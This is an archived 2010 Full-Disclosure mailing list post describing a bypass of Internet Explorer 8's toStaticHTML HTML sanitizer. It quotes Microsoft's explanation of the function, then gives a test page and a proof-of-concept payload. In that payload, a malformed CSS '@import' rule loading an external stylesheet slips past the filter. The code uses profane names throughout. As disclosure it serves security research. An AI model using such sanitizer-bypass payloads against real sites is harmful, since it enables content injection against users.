lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Sat, 14 Aug 2010 15:55:55 +0800
From: Web Sec <root@...ec.com>
To: full-disclosure@...ts.grok.org.uk
Subject: IE8 toStaticHtml Bypass

IE8 toStaticHtml Bypass

Safer Mashups: HTML Sanitization
IE8 exposes a new method on the window object named toStaticHTML. When a
string of HTML is passed to this function, any potentially executable script
constructs are removed before the string is returned. Internally, this
function is based on the same technologies as the server-side Microsoft
Anti-Cross Site Scripting Library mentioned previously.

So, for example, you can use toStaticHTML to help ensure that HTML received
from a postMessage call cannot execute script, but can take advantage of
basic formatting:

document.attachEvent('onmessage',function(e) {
if (e.domain == 'weather.example.com') {
spnWeather.innerHTML = window.toStaticHTML(e.data);
}
}

Calling:

window.toStaticHTML("This is some <b>HTML</b> with embedded script
following... <script>alert('bang!');</script>!");

will return:

This is some <b>HTML</b> with embedded script following... !

----------------------------

That is some info about toStaticHtml function from
http://blogs.msdn.com/b/ie/archive/2008/07/02/ie8-security-part-v-comprehensive-protection.aspx,80sec
found there is someway to bypass this function,it may be XEESD :)

You can test with somecode below:

<script type="text/javascript">
function fuckie()
{
var szInput = document.shit.input.value;
var szStaticHTML = toStaticHTML(szInput);

ResultComment = szStaticHTML;
document.shit.output.value = ResultComment;
}
</script>

<form name="shit">
<textarea name='input' cols=40 rows=20>
</textarea>
<textarea name='output' cols=40 rows=20>
</textarea>

<input type=button value="fuck_me" name="fuck" onclick=fuckie();>
</form>


<style>

}@...ort <%7D@...ort> url('//127.0.0.1/1.css');aaa

{;}

</style>

<div id="x">Fuck Ie</div>

http://www.wooyun.org/bug.php?action=view&id=189

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ